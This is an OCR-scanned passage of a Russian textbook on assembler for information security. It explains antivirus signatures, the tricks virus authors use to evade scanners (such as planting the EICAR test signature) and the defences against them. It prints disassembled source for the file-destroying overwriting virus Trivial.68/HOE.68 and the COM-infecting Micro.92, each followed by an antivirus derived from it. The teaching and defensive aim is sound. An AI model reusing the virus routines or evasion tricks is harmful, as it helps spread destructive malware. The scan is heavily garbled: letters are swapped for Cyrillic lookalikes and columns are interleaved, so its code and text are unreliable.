нию но болыной (8—16 бай " 
хода. При достаточ ан 
от начала/конца/точки в то длине 
нию ектном ее выборе (очевидно, не стоит задавать в качестве сит оРы праженио 
и корр команды выхода в ОЗ) вероятность ложного срабатывани м. 
ай, , стремится к нулю. Проще говоря, в данном месте данного незар 
айле с . 
тся. ат 
ы достоверно не окаже .  мепиет нап 
ти однако все сказанное относится к незараженным файлам. Никто о т ению 
с, который будет подставлять именно эту сигнатуру именн а п рожей 
а альше? Антивирус сработает по известной ему сигнатуре, то а ити може 
ги ения сохраня , а 
ину, другие смещ м 
сом, имеющим другую длину, Е о 
нь ке другой алгоритм заражения. В результате "вычищенная" от вируса пр 
ыть, даже я 
окажется заведомо неработоспособной. 
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ооооносониоове . . 2 


Другая лазейка для "технокрыс" заключается в существовании стандартных тестов 

айлов, например, ЕГСАВ. Подставив сигнатуру из этого файла в начало своего виру 
можно добиться такого эффекта: не знающий данного вируса полифаг распознает за 
женные программы как "модификацию тестового файла ЕСАВ. (НЕ вирус!" 
как неизмененный тестовый файл. 


Третья лазейка — это некачественные антивирусы, кото 


или да 


рые, кроме сигнатур вирусо 
содержат сигнатуры "заведомо чистых" файлов. Например, ТВАУ при наличии так 


сигнатуры в Точке входа вообще не выполняет проверку файла на известные вирус! 
Лучше всего никаких сигнатур "заведомо чистых файлов" не использовать вообще, ау 
если без них не обойтись (как в случае с тестовым файлом Е!САБК), то проверка на 1 
наличие должна выполняться после проверки на все вирусные сигнатуры. 

Как противодействовать таким вирусам. 


Меры противодействия авторам так: 
вирусов достаточно очевидны: 


и использовать длинные сигнатуры, выбирая для них куски кода, важные для выполнен 
(хотя это не всегда реально, а для вирусов, написанных на Ассемблере — нередко из 


труднительно, опытный противник найдет способ вставить сигнатуру в нужное место); 
и использовать более одной сигнатуры; 


й сигнатуры для стандартных тестовых файлов выбирать с таким расчетом, чтобы пр 
тивнику приходилось модифицировать эти куски кода во избежание каких-либо н 
желательных эффектов (например, выдачи на дисплей Е САВ. сообщения); 

й реализуя антивирус, не включать в базу "неприкасаемые" сигнатуры; стандартные тест 
ровочные файлы (за исключением для названия вируса) 


как если бы это был замещающий вирус, что приведет к его улалению в режиме чистки; 
® вслучае появления нового вируса, содержащего те же байты по тем же смещения 

что и в уже известном по предыдущим версиям антивируса, включать его в антив 
русную базу до этого уже известного, а лучше — пе 


изменив или расширив сигнатуры; 


описывать в вирусной базе та 


реработать чистку обоих вирусо 


и антивирусы, поддерживающие "неприкасаемые" сигнатуры (например, ТВАУ), сч: 


тать заведомо некачественными, полностью исключить из применения, 
дисках не держать. 


3.2.5. 


на жестки 


Пример замещающего вируса и ассемблерной 
подпрограммы его обнаружения 


о В данном разделе рассматривается простой замещающий вирус Тгу!а1.68 (он ж 
Нор.68), написанный на Ассемблере. 


Замещающие вирусы 
ДНовременно и самая оп. 


— самая примитивная разновидность компьютерных вирусов, н 
3-за ошибок и/или спе 


асная. Если вирусы других разновидностей могут причинять вре 
циально запрограммированных деструктивных функций, то у заме 
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нуйте таким образом все переменные и только после этого сохр 


аняйте файл с исход 
текстом на диск. 


шающих вирусов деструктивен сам способ распространения. Они пишут себ; 
в файл-жертву, начиная с нулевого смешения и не сохраняя где-либо замещаемый фраг. 


мент кода (отсюда их более точное английское название — оуегу те, "перелисывающие"), Итак, переходим к исходному тексту вируса ОНор.68. 
] Вирус ОНое-68, кроме необратимой порчи файлов непосредственно при заражении, с. рее НОА иже 
| тавляет в оперативной памяти так называемый "дутый резидент", т.е. выделяет блок памяти з 


аз5ище с5:5е9000 
ога 1001 
аззище ез:пое1119, 53: поЕЬ1па, 98:5е9000 


очень большого размера и не освобождает его. На компьютерах с грамотно настроенным ме. 
Е} .. 
неджером памяти после запуска вируса остается порядка 100 килобайт, аесли менеджера па. 





мяти нет, то свободной памяти может и не остаться вообще. Это, очевидно, приведет к зави- И РУ с = а 
В ы ., „ 
санию РОЗ с выдачей сообщения "Не могу загрузить командный процессор!". , за ро тет 
Вирус заражает все файлы в текущем каталоге, сбрасывая атрибуты КеадОщу, На Чел м а 140 
и Зубет. Исходный текст вируса представлен ниже. , ; Поиск первого файла по маске *.* 
Для получения дизассемблированного исходного текста применен дизассемблер ША 106 218 
$; 005-2+ - 
4.04. Он позволяет исследовать дизассемблированную программу в интерактивном ссз-2 -- то тот ь си ЕОЕТВЗТ) 
режиме (кстати, ША и расшифровывается как И\егаснуе 015АззетЫег), менять имена ев 
| в полученном исходном тексте, именовать любые ячейки памяти, и так далее, и так да- ее жен 
. лее! (Полный обзор функций и применения этой программы требует отдельной книги). 10с_0 107: . р СОБ УВЕ: аа 
й Комментарии на английском языке в исходных текстах автоматически внесены дизас- оу ан, 438 
| семблером. Комментарии на русском языке добавлены автором. . пох :. В 
теньких программ несложен и не требует , 
от у р " аем в сре ; Получить атрибуты найденного файла 
особых комментариев. Введя командную строку "19ах.ехе 4пое.сот", мы попад реду и И а трибун надшенного $ 
ГРА, который выдает панель настройки режимов дизассемблирования. В нашем случае и» 
ы 


0$: ОХ -> АЗС12 Е11е папе 
; ог Ч1тес®огу паше м1 ЕоцЕ 
{га11119 $1азВ 


изменение не требуется. Убедитесь, что указан режим загрузки файла как СОМ-программь | 
РО$ и нажмите клавишу ЕМТЕВ (или щелкните мышкой по кнопке ОК). Дизассембле: , 


Й й ' ь, 43 
быстро обработает маленький вирус длиной 68 байт, выдаст сообщение "КЕАРУ . оу а 43 
й ! 
в верхней строке экрана и перейдет в режим ожидания команд пользователя. Войлим по а 
в меню ЕИе\Ргодисе ощриЕ Ш и сохраните результат дизассемблирования в А5М-файле. оу ВИ , оОбросить атрибуты 


с 
При перекомпиляции дизассемблированных исходных текстов надо помнить, что у ва 


Е 21 ; 20$ - 2+ - $ЕТ РИ АТТВТВОТЕЯ 
скорее всего, окажется другой компилятор (например, ТАЗМ вместо МАЗМ) и уж навер 


; 03; [Х -> А$С17 Е1]е папе 


И | $} СХ = Ее абетрие Ь15 
няка — другие настройки компилятора. Поэтому, прежде чем компилировать сохранении, о ах, 30015 
в среде РА текст, не поленитесь исследовать его на предмет чисел, требующих замены ы поУ 4х, ЗЕВ ; Открыть файл-жертву 
псевдооператоры ОРЕЗЕТ или ЕОЧЦ. Тогда компилятор автоматически подставит в км ; для записи 
ды правильные смещения, и перетранслированная программа выдаст по РО5-функции 0 к и 21ь #008 - 2+ - ОРЕХ 015 ЕЕ 
требуемое сообщение. РА хорош в этом отношении тем, что позволяет именовать И ; Е от Непале 
ъ такой фрагмент. 2: ^ 
памяти в интерактивном режиме. Например, ниже в исходном тексте ест фр ; АБ = ассезз поде 
1 - мие 
моу р С хсва ах, 5х ; Ехсрапде Вед1зКег/Мепогу 
то 5" ; ИТЕВ Вед15Еег 
1п оу ап, 408 
., И ' 
Это поиск по маске первого файла. того чтобы избежать лишних зависаний Е. поу с1, 441 
с С , 
перетрансляции, нужно перейти в окне дизассемблированного кода в ШЛА на адре Е ть Яо оретаетоп 


: име" м пор ; № Орега оп 
1405, нажать клавишу № и ввести какое-либо имя (в примере — а_МазКЕогУп). П и 
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ие дх, 100.; Записать вирус 
; из оперативной памяти в файл 
10 216 ; 00$ - 2+ - МВТТЕ ТО Е1ШЕ 
; МГТЕ НАМОЬЕ 


; ВХ = ЁЕ11е Вап91е, СХ = попрег оЁ Буез 
; ко мые, 05: ПХ -> раЕЕег 


пу ай, ЗЕн ; Закрыть файл-жертву 
10 211 ; 00$ - 2+ - СЬО5Е А ЕШЕ 


; ИТТЕ НАМОЬЕ 00000000 
; ВХ = Ее рап91е 


поУу ай, АЕБ ; Искать следующий 
116 21 ; 00$ - 2+ - ЕТМО МЕХТ АЗСТА 
; (ЕТМОМЕХТ) 


[2ТА] = Заба Боск Егоп 
1азе АН = АЕВ/4ЕВ са11 
З0Ь 10с_0_107 . ; Пока еще есть 

; неиспорченные файлы - 

; крутимся в этом цикле 


ет ав, 318 
поУ ах, 75308 ; Выйдя, оставим "дутый" 
; резидент 
вы 216 ; 00$ - 00$ 2+ - ТЕВМТМАТЕ 
; ВОТ 5ТАУ ВЕЗТРЕМТ 
зах епар ; АБ = ех1е соде, 
| ; 0Х = ргодхат з12е, 
| ; 1т рагадгарйз 
а_МазКРот\ 1х 46 '*.*',0 ; Маска в формате АЗСТТА 
5е9000 . епд$ 
епд зв ахе 


Напишем антивирус. 
Случай простой, и можно взять за основу дизассемблированный исходный Тек. 


самого же вируса. Очевидны необходимые изменения: убрать оставление в ОП "дуто 
резидента", вместо заражения файлов сделать обнаружение сигнатуры вируса, и в случ- 
обнаружения — принимать меры. 

Очевидно, что все файлы, зараженные замещающими вирусами, необходимо стире 
с диска. Кроме того, полезно перед стиранием "убить" зараженный файл, т. е. запись. 
в его начало команду ПМТ 201. Это предохранит от новой вспышки вируса, если стерты! 
файл с вирусом ошибочно восстановят (например, программой ОиЕгазе) и запустят. 

Наличие вируса будем определять по длинной (14 байт) сигнатуре по смешению ОЕ 
от начала файла. Для простоты программы (все-таки это демонстрационный пример, а 
реальный антивирус) напишем вариант, проверяющий файлы в текущей директорий. 

Антивирус носит явно выраженный тренировочный характер — достаточно сказат” 
что нет рекурсивного обхода каталогов. Программа АпбрНое написана как пример ре 
лизации поиска сигнатур на Ассемблере, и ее реальное применение для защиты комиь 
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тера не предусматривал 
пе тр тривалось. Хотя оно и возможно — но придет 
лог, куда могли попасть зараженные файлы РТО проверять каждый ка 


Ниже представлен исходный текст антивируса 





===АпЕ1ОНод.азщ =======ененнненень=е 


;= Переместить указатель в файле ======= 
мочеРРозпаско Рае, Рё о 





Поу ах, 4200 
поу Ьх, Е Напд1е 
хог сх, сх 

поу ах, ЕРоз 
мы 211 

епам 


1пс1а4е 10.1пс 
зедтепЕ рРубе руб11с 'СоБЕ' 

аз5чще сз:5е9000 

ога 100: 

аз : | 
вн НА, 45:569000 

руБ11с зкаге ии 

5аге ргос пеаг 


РаЕбег Т1Е1е5ех 
;=== Поставить ОТА === 


5е9000 


ПОУ ан, 1АВ 
поу Чх, ОЁЕзеё РОТА 
оу сх, 27 
___ 116 218 
поУ ан, 4ЕМ 
ПОУ ах, оЕЕзеЕ а_МазКРог\/1т 
и ль ; Поиск первого файла по маске *.*. 


# 005 - 2+ - ЕЮ 218$ 

Т 2512 (21 

; СХ = зеагсЬ ае&х1Биеез "ЕТ 

; а -> А$С12 Е\езрес 

, ; (Сгтуе, рабЪ, ап@ ч119с 

= Пересл ; СООЕ ХВЕЕ: БатЕ+37 1 п атоме 
ать имя в переменную ЕМаше === 


3295 сап: 


разн 95 
рор е5 
доу 34, ЕМ 0Е5 
поу 41, оЕЕзе* ЕМапе 
ОУ. сх, 13 
ны Ро ЗЫ 
поу ан, 430 























: 


: 


‚ 


В 


МехЕЕ11е: 
са11 Саге]рЕо 
оу ай, ДЕН ; Искать следующий 
11 218 ; 00$ - 2+ - ЕТО МЕХТ А$С12 (ЕРТМОМЕХТ) 
Я [РТА] = даба Б1осКк Ёхом 
; 1аз6 АН = 4ЕБ/4ЕЬ са]11 
ЭтЬ Веабсап ; Пока еще есть непроверенные 
; файлы - крутимся в этом цикле 
11 20% 
збагЕ епар 


ПоУ ах, оЕЁзеё ГМапе 
; Получить атрибуты найденного файла 


106 218 ; 00$ - 2+ - СЕТ ЕТЪЕ АТТАТВОТЕ$ 
; 0$5:0Х -> А$С12 Е1е паше ох 91гесботу 
. ; пате м1роие &ха1]1п9 .$1а$В 
ПОУ . ап, 438 
поУ а1, 1 
ет 9х, ОЕЁзеё ЕМате 
поу с1, 0 ; Сбросить атрибуты. 
116 21В ; 00$ - 2+ - 5ЕТ ЕТЬБ АТТВАТВОТЕ$ 
; 0$:0Х -> А5С12 Ее паще 
; СХ = Ее аёбг1рще 513 
оу ах, 30108 
поУу ах, оЕЁзеф ЕМате 
; Открыть файл-жертву для записи/чтения 
116 211 ; 00$ - 2+ - ОРЕМ ОТ$К ЕТЬЕ ЯГТН НАМРЬЕ 


; 0$:0Х -> А$СТА Е1епапе 
; АЦ = ассезз воде 
; 10 - геад/че1%е 


| ; Сохранить номер файла 
поу ЕНапа]е, ах 


ое ар, 408 
поУ с1, 448 
пор ; № Орега {оп 
пор ; № Орега оп 


; Выдать имя файла 


са11] ТпРоАБодЕЕе 


; Проверка сигнатуры 


са1] Веа951дпаеиаге 
стр $19паеохегоцпа, 0 
)е МехЕР1]е 


; Записать в начало файла команду 118 208 


са11 К111Ехесабар1е 


; Стереть файл 


са11 КепвоуеБхесиа 1 е 
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роты сыеье ВЫ 


оон вия Но р воров уавовреае 
ов иво и ини ноо нони осин нниниь 





а МазКРотУ1т 4 '*.*',0 ; Маска в формате А$СТ17 
рТА ЧЬ 43 дир (0} 

7М_0Е3 еаи оЕЁзеЁ ОТА+ТЕЬ 

Мате Ч 128 аир (0} 

тМапе ЧЬ 128 апр (0) 


с1дпаситеРоцла Ч 0 
сздпасагейхгау Ч 14 дир (0) 


уигб1апае ге р ОСОВ, 216, ОВ4Ъ, 431, ОВОВ, 018, ОВАВ 
ЗЕВ 
бота а сов, 2 ‚ 00, овлн, оон, осрн, 215, оввв 
ЕНапд]1е Чи 0 
тилебт ежи, 13, 10 
ЧР '|АпеОНод - пример антивируса!', 13, 10 
О +', 13, 10, '$' 
№ттбЕгЕ Фр '-0х', 13, 10, '5$' | 
СохебёЕх ЧБ ' - пришлось стереть!', 13, 10, '$' 
; Прочесть и проверить сигнатуру вируса | о 
Веа451дпаЕоге рхос пеаг 
; Сбросить флаг найденной сигнатуры 
оу 519пабитеРоир@, 0 
; Переместить указатель на смещение ОЕЙ 
МоуеРРоз ЕНап@1е ОЕЙ 
; Прочесть первые 68 байт вируса 
поу ай, ЗЕЬ 
оу Ьх, ЕНапа1е 
поу сх, 14 
поу 9х, оЕЁзее $19паагеАггау 
10 21 
; Проверить чтение 
с1а 
разн 9$ 
рор ез 
оу $1, оЕЁзеё У1т51дпабате 
оу 91, оЁЁзее 519пабигеАхгау` 
ре оу сх, 14 
спирз 
р ина | 312 Р11156 
Ура найдена! 
Нав, ие оу 519паитеРоипа, 1 


аа ла ихе епдр 
Ехесцеаь1е ргос пеаг 
Реместить указатель 


; в МоуеЕРоз ГНап41е 0 
Убить" файл 


поу ан, 40% 


ОИ ИИОИИ 


; Закрыть файл 





10 
ге 
К11] Ехесикар]е  епар 


рх, ЕНап]е 

сх, 2 

ах, оЕЁзее Тле20Спа 
218 


ай, ЗЕВ 
ьх, ЕНап@]е 
лв 


ВетоуеЕхеся+аЪ1е ргос пеаг 


; "Вытереть" файл 
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удаления. Затем (после главной подпрограммы) идут директивы объявления пере 
ных, а После этого раздела — все подпрограммы, реализующие проверку сигна 
“убивание" файла, удаление его сдиска и выдачу информации о зараже 
сти/незараженности файла. 
Еще один антивирус из вируса. Изготовление антивируса из самого же попавше 
ся вируса возможно и в более сложных (до известных пределов - например, из перму 
рующего вируса сделать антивирус от него же очень сложно, игра не стоит свеч) слу 
ях. Рассмотрим изготовление антивируса из паразитического вируса Мисго 
заражающего СОМ файлы в текущем каталоге стандартной записью в их начало. 
Начнем с полученного в среде ГРА листинга вируса. ‹ 


0100 ; Зедщепе суре: Риге соде 
доу ав, 418 | 
поу ах, ОЁЁзее ЕМате 0100 $е9000 зедщепе Бубе раЪ]1с 'СорЕ' 
пе 218 0100 аззите с5:5е9000 
ге 0100 огд 1008 
ВепоуеЕхесякаЪ1е епар ` 0100 аззище ез:п0еВ119, 55: попа, 45:5е9000 
ТпРоАроцеЕ1 е рт тет 0100 ° 
раз 3 . 
ор ез 0100 ручБ11с зкаге 
поу $1, ОЁЁзее ЕМаме 0100 зеахе ргос пеаг 
| по 91, оЕЕзее ТМаше 0100 В4 4Е оу ав, 4ЕВ 
МехЕСваг: 1о493Ъ 0102 8В РЕ поу 91, $1 
$5055 то 0104 
спр а-, . . 
пе МехЕСвах 0104 Мод51 Ста: 
ес а | 0104 81 С6 00 ЕЕ ааа $1, ОРЕООН 
поУ Буке рег [91], '$' 0108 ВА 56 01 доу Чх, оЕЁзеё ЕМазк ; "*. сот" 
РОЕЗЕГ Маме 0108 В1 5С поу с], 5С® 
ге 0100 
ТпРоАросеЕ11е епар 010р беатснЬоор: 
Сагеторгос пеаг в, 9 0100 ср 21 106 218 
оу а 
оу ах, оЕЕзее Могибег 0100 
сир $+дпасотеРомла, 0 010Е 72 35 )ъ Моуебоде ; Больше файлов нет 
Зе опия & Сигебег 0111 ВА ЗЕ 00 поу ах, ЭЕВ 
| 
пох @х, 01186 0114 В8 02 30 пу — ах, 30028 
СопЕМз9: 11 ра 0117 ср 21 ие 28 
ге 
0117 
Сиге1пЕо епар м 
3е9000 епаз 19 93 хс19 — ах, Бх 
еп зат а ееееаеваннненнннея ОА В6 РЕ поу Ч, ОРЕ 
ужааекненеееенянанняннЕнЕннЕнЕн====5===2=2 ения #8 011с в4 ЗЕ оу ав, ЗРВ 
очевидно, пришлось изменить смещ р р 
В дизассемблированном исходном тексте, р о вместо него обнаруже ЦЕ ср 21 10 211 
директивы ОЕЕЗЕТ. Из вируса выкинуто заражение и вставлен 





я ег Е 
й " " зараженного файла и . 
ние сигнатуры, и если она найдена — процедуры убивания" зар 


. 
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151 
0120 80 ЗЕ ЗЕ ЕЕ В4 спр руке рег 4з:ОЕЕЭЕВ, ОВАВ в 3 5 ор рвом нет сбоя, то АХ 
; Примитивная проверка зараженно 
; содержит новую позицию 
0125 74 17 32 МехеЕ11е . у в файле 
0127 во 02 поу а1, 2 ; ЕЗеек с конца файла 154 59 ор сх 
0 
0129 Е8 1Е 00 са11 21] ебееК а 0155 3 хееп 
012С АЗ 06 01 ем мота рЕг Мо9$1СтЯ+2, ах 0155 РИ ебееК епар 
; Адрес буфера для нового 155 
. мв ОП после кода СОМ файла 
012 ; экземпляра размешае 0156 2А 2Е 63 4Р 60 00 ЕМазк ЧЬ '*.сбт",0 
0122 В4 40 оу ав, 408 0156 5е9000 епз 
0131 С0 21 11 218 0156 
0131 156 еп Ч эрахе 
0133 32 с0 хор а], а1 у 
; АЬ:=0, Ебеек с начала файла Из этого вируса сделать антивирус уже сложнее. Во- -первых, нужно учесть 
0135 ЕВ 12 00 са11  РИебеек возможных варианта: 
0138 8В 57 поу и р № зараженный файл, из которого вирус надо вычистить, 
013А В4 40 поУ ри и ичистый экземпляр вируса, который надо просто стереть. 
1 10% . 
0136 со 2 Во-вторых, такого рода вирусы-малютки основаны на комбинации функций ] 
ее МехеЕе: которые не портят необходимых для работы алгоритма значений, находяш 
я ЗВ ВА ЗВ оу аъ, ЗЕВ в регистрах; антивирус, основанный на педобных комбинациях, написать тоже можн, 
0 Со 21 Е 21 рассматриваемая версия использует просто сохранение значений в выделенных для : 
0140 переменных или в стеке перед вызовом "портящих" подпрограмм. Наконец, в-третьи 
142 ВА 4Е ом ав, АРВ Мисго.92 нужно выкинуть больше команд, специфичных именно для вируса. 
; 4ЕВ - найти следующий файл В отличие от ОНоР.68, здесь команды, связанные с алгоритмом заражения, 
в пр ноге беахсВьоор раскиданы по телу вируса (насколько это возможно в таком маленьком вирусе). Кс 
014 да под меткой Мо4$1Ст4 устанавливает регистр 51 на буфер сразу после кода ф: 
0146 мМотесоде: жертвы. Точнее говоря, в дизассемблированном чистом экземпляре она сделане 
0146 ; ° а вынесения буфера "с запасом" ближе к концу сегмента. А вот при заражении ках 
8 > > 
0146 57 ре уз нового файла в ее поле операнда заносится размер файла-жертвы, чтобы вирус мо! 
е > 
0147 ЕЗ А4 м тать его "голову" сразу же после "хвоста"; это делается командой 
0149 С3 тет , 
0149 зкахе епар ; зр = -2 поу мог рег Мо951СпЯ+2, ах, 
0149 а в регистре ах находится размер файла, полученный переходом на его 1 
014А Е ебеек  ргос пеат подпрограммой ЕЦеЗеекК. 
014А Алгоритм вычищения зараженного файла более-менее очевиден: 
014А 51 — р и \ считать 92 байта из конца файла, 
х 
с14в 52 ри \ переписать их в начало, 
[о 
0145 ы- сз кот сх, сх | № после чего перейти на 92 байта от конца файла и отрезать уже ненужный кусок. 
0142 ' и 
014Е В4 42 оу ав, 428 : | 


Е Итак, исходный текст антивируса. 
0151 СО 21 1пе 21 . р 








\ 
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; Антивирус против вируса М1сго.92 оу ах, оЕЁзее ОКМз9 
; Изготовлен из самого дизассемблированного вируса 1% 218 
1 1 1 
5е9000 зедтепе БуЕе руБ11с 'СОБЕ | НехкЕНе: 
аззите с5:5е9000 
ога 100 оу рх, ГНапЯ1е 
аззуте ез:поВ1па, 3$:по1119, 93:5е9000 поу ав, ЗЕв 
Е 218 
ра! 1с эфахЕ 
саге ргос пеах | 
. сп 59п5бае 
са11 — Зноме про. Забыв, 2 
поу ап, А4ЕВ пе $К1рре] 
оу 91, 51 . поу ав, 418 
поу ах, ЗЕ 
ада $1, ОЕРООВ а 211 ; Стереть файл по имени, указанном в ОТАНТЕВ 
оу <, ее ЕМазК поу ав, 9 
поу с 
‚ И" поу ах, оЕЁзее Ое1Мз9 
ЗеагсВЬоор: ‚ | те 218 
Зе 218 Е $к{р0е!: 
. — : оу ав, 4РВ ; АРЬ - найти следующий файл 
)ь ЕтазВ ; Больше файлов нет з | пр ЗВогЕ беагсвЬоор 
оу ах, ЭЕв ; Имя найденного файла в ОТА ‚о : 
поу ах, 30028 Г. И 
пе 21 + РП 5Н: 
ЕЕ вы 208 
ре ах, Ьх 29 зтахё  епар 
поу ЕНап9]1е, 5х ; Запомнить идентификатор файла ] 
са11 ит1сеРМате Е Е ебеек рхос пеаг 
оу ав, ЗЕВ - 9 я 
доу сх, 92 ; Размер считываемого куска м раз сх 
поу ах, ОЕЁзеЕ ВыЕЕех М: разв 9х 
106 218 М: суЯ 
, хог сх, сх 
са11 Сбеег512е , поу ан, 42. 
. са11 СВК5 дп ; Проверка зараженности + 21ь 
| стр Запббаби5, 0 т 
| ]е СпЕПе 
стр запзеаеиз, 2 , ГЕ : рор 9х ; Боли нет сбоя, то АХ содержит новую позицию в файле 
)е МехЕе } Вытереть после закрытия Е рор сх 
са1] — Веточе\1тиз ; Чистка | М: тееп 
поу ав, 9 Р]ебееК епар 
оу ах, ОЁЁзее С1пМза ЕК 
10 21 Ч тнаае ам 0 ` 
пр МехеР! 1е 251 2е м 0 
СлЕЦе: З9п55аеи5 90 ;0- чистый файл, 1 - зараженный файл, 2 - вирус без жертвы 


поу ав, 09% ; Выдать 'ОК' для чистого файла 




















Ассемблер в задачах защиты информации 


ВаЕЕег 
\1:51дпаеяге [61° 


Ч 92 аар ('.') 
вов, 021, ОЕЗВ, 1ЕВ, 00%, ОАЗЬ, 061, 01% 


[61°] оВав, 40%, ОСЬЬ, 218 
$91025 м 275 
$91512е ам 12 
ЕМазк Ч '*.сов',0 
ОКМ59 4 '-о0%', 13, 10, '$' 


С1пМ59 ЧЬ ' заражен М1сго.92 - вычищен!', 13, 10, '$' 
Ое1М54 4Ь ' заражен М1сго.92 - пришлось стереть!', 13, 10,. '$' 
талетеже аъ "жж, 13, 10 

4% '| АпЕ1-МЕсго. 92 |*, 13, 10 


4 "| Антивирус из вируса. |', 13, 10 
ЧЕ, 11 "$' 







ЗвомТ1 Ее ргос пеах 
оу ав, 9 
оу ах, оЕЕзее Т1&1еТехе 
306 218 














ге 
ЗвомТ1 Ее епар 


; Проверка сигнатуры 
СВК5бап ргос пеаг 











поу Зап а яз, 0 ; Ничего пока не найдено 
сир Е512е, 92 ; Не проверять - слишком маленькие файлы 
35 Ех ЕСВК59п 

с1а 

оу $1, оЕЁзее ВчЕЕег 

ада 91, $9105 

поу 3}, ОЕЁзеЕ У1т519пабаге 

оу сх, 591512е 

гер сирзЪ 

сир сх, 0 й 
)пе Ех ССВК59п ; Сигнатура не найдена 
оу Запбвае аз, 1 

сир Е512е, 92 

За ЕХЕЕСВК5 9 

поу Запббаеиз, 2 


; Проверить: а не чистый ли это экземпляр вируса? 
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зените нони оооонани ООО Юва к СВ бро во ров нь в БОНО ВО ООО орон роса о о о ор во попона ово а 


Ех СВК$9п: 
ге 
СВКбап епар 


; Чистка вируса 
Вепоуе\1тиз ргос пеаг 


са11 Гоа М1 се 1 
са]1 Зауе\1 се 
са11 ТголсРИе 
хеё 


Вемоуе\1га$ епар 


; Считать код жертвы из конца файла (92 байт) 
Тоаа\1сЕ 1 ргос пеах 
; Перейти на 92 байта от конца файла 


поу Ъх, ЕНап1е 
поу а1, 2 
оу ах, 92 


са11 Е11ебеек 
; Считать последние 92 байта 


поу ав, ЗЕВ 

ен Ьх, ЕНапЯ]е 

оу Ах, оЕЁзее ВиЁег 
оу сх, 92 

31 218 

её 


Тоа9У1се ип епар 


; Записать считанный код жертвы в начало файла 
Зауе\1сЕ в ргос пеах 
; Перейти в начало файла 


* 


х 


поу Ъх, ЕНапа]1е | 
хог а1, а] < 
хог 4х, ах 


са11 Е ебеек 
поу ав, 408 


оу Ъх, ЕНапа1е 
оу Ах, оЕЁзее ВяЁЕЁЕег 
поу сх, 92 
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106 218 
ге 
Заме\1сЕ1а епар 


Их1сеЕгМаще ргос пеаг 


разв 51 , 

разь ах 

ен 51, ЗЕ 
№МхЕСВаг: 

1095Ъ 

стр а1, 0 

зе Таз Сваг 

поу 91, а1 

поу ав, 028 

1706 218 

пр №МхеСпах 
Таз Сваг: 

рор ах 

рор 51 

ге 


Их1тегМаще епар 


бе{Е512е рхос пеаг 
оу ах, 42028 
оу Ъх, ЕНапЯ1е 
хог сх, сх 
хог 9х, ах 
306 21В 
оу Е512е, ах 
оу ах, 42008 
хог ах, ах 
хог сх, сх 
ры - 216 
хог ах, ах 
хеё 

беег512е епар 

ТкапсР11е ргос пеаг 


; Перейти на 92 байта от конца файла 
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поу рх, РНапЧ1е 
оу а1, 2 
оу 9х, 92 
са11 Е11ебеек 
оу ав, 408 
оу Ъх, ГНап1е 
оу Ах, ОЕЁзее ВаЁРех 
хог сх, сх ; Писать 0 байт - отрезать файл 
; по текущей позиции 
1пЕ 21В 
хе 
Турс 1е епдр 


5е9000 епаз 
епа саге 


, 


В качестве сигнатуры вируса выбраны 12 байт от начала вируса. Поскольку пос 
ний пишется в начало файла, то не нужно рассчитывать смещение сигнатуры для ка 
го файла в зависимости от его размера. 


Подпрограмма СЬК$2п проверяет сигнатуру и присваивает переменной $2153 
одно из трех значений: 


0 - незараженный файл, . 
1 - зараженный файл, 
2 - "голый" вирус. 
Реакция на эти значения следующая: 
0 - просто сказать ' - ОК; 
1 - вычистить вирус и сообщить о вычищении; 
2 - сообщить, что файл пришлось стереть, что и сделать после‘его закрытия. 
Для повышения скорости работы приняты, например, такие меры, как отказ от 
верки слишком маленьких файлов (менее 92 байт). Сама проверка сигнатуры реали: 
на через команду стрзЬ (хотя можно и еще ускорить, заменив стрзЬ на стрз\м и в 
Уменьшив начальное значение сх). 
И последнее. Изготовление антивирусов из вирусов - отличная тренировка в ассембле 
программировании, но все же не из любого вируа можно быстро сделать анти 
(из полиморфных и пермутирующих в особенности). Столкнувшись с вирусом, хотя бы 


ким примитивным, вживую, подумайте дважды: а стоит ли делать антивирус из 1 
Написать с нуля может быть и быстрее, и надежнее. 





Глава 4 
Ассемблер 
в операционной системе Глпих. 


ОС 1Мпих давно получила широкое распространение не только среди системных 
администраторов, но и среди обычных пользователей, применяющих эту надежную 
и безопасную операционную систему с открытым кодом в качестве своей домашней 
рабочей станции. Под эту операционную систему экспортированы самые популярные 
пакеты программного обеспечения или написаны подобные. 

Помимо популярности данной ОС среди обычных пользователей, считается, что 
Глпих — одна из самых безопасных операционных систем, именно по этой причине Ипих 
устанавливается на сервера Интернета, корпораций и небольших предприятий. В отли- 
чие от изделий таких компаний, как Масгозой, НР, Зип Мегозуйетз, Мпих — продукт 
бесплатный и с открытым исходным кодом. 

На практике же сервера под управлением открытых систем (Гапих, РгееВЗО) взламы- 
ваются чаще других. Дело не в самой операционной системе, а, скорее, в программах, 
которые на этой ОС используются. Так как сами исходные коды открыты, то многие 
хакеры исследуют программную реализацию тех или иных компонентов серверов. Цели 
у всех разные: кто-то ищет ошибки, кто-то учится писать свои программы и рассматри- 
вает алгоритмы, но результат один — нахождение ошибок и их исправление. 

Сама 1лпих написана на С, так же, как и все программы под нее. Ассемблерные 
вставки встречаются очень редко, исключительно для прямой работы с регистрами или 
памятью, что является не такой частой необходимостью. Сам ассемблер для написания 
программ используется строго двумя типами программистов: 


# хакерами, пытающимися переписать ядро; 
# хакерами, пытающимися взломать систему. 


С точки зрения защиты информации для нас представляет интерес вторая категория 


хакеров. К этой группе можно также добавить авторов компьютерных вирусов (КВ), ДЛЯ. 


которых, порой, просто необходимо реализовать код КВ на ассемблере. Рассмотрим 
примеры программ, используемых хакерами для нанесения конкретного вреда системе 
и борьбы с ними. 
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зона вы ван авиа а ааа аа ао зоо ани и ве а заза аавнаное . зовзвнание Ярина знана зазенаа 
зъана нова наи в чо пиво нов ичонви паза ааа ия оо но чавочя 
зазовьнаь 


11. Синтаксис 


Как уже говорилось выше, сама операционная система написана на языке С. Все сис- 
темные функции также реализованы на этом языке с небольшими вставками ассемблера 
при использовании системных вызовов В1Об5 и прямого обращения к памяти. Существу- 
ет несколько видов синтаксиса ассемблера под пах. Привыкшие к синтаксису, предло- 
женному компанией | (он используется при написании программ под 2О$ 
и \ дом), могут вздохнуть облегченно — есть компиляторы (пазт), поддерживающие 
именно такой, экзотический для лпих, синтаксис, хотя истинные хакеры используют 
творение АТ&Т (газ). 

Основное отличие их в том, что названия регистров в АТ&Т синтаксисе не зарезер- 
зированы, что приводит к необходимости выполнения лишних действий — подстановкам 
суффиксов, о которых и пойдет речь. 

Названия регистров те же, что и у Пи|, но проблема заключается в том, что компиля- 


тор не поймет вас, если вы просто укажете их имена. Обязательным является подстанов- 
ка суффикса % перед названием регистра: 

$еах 

3а] 

чай 


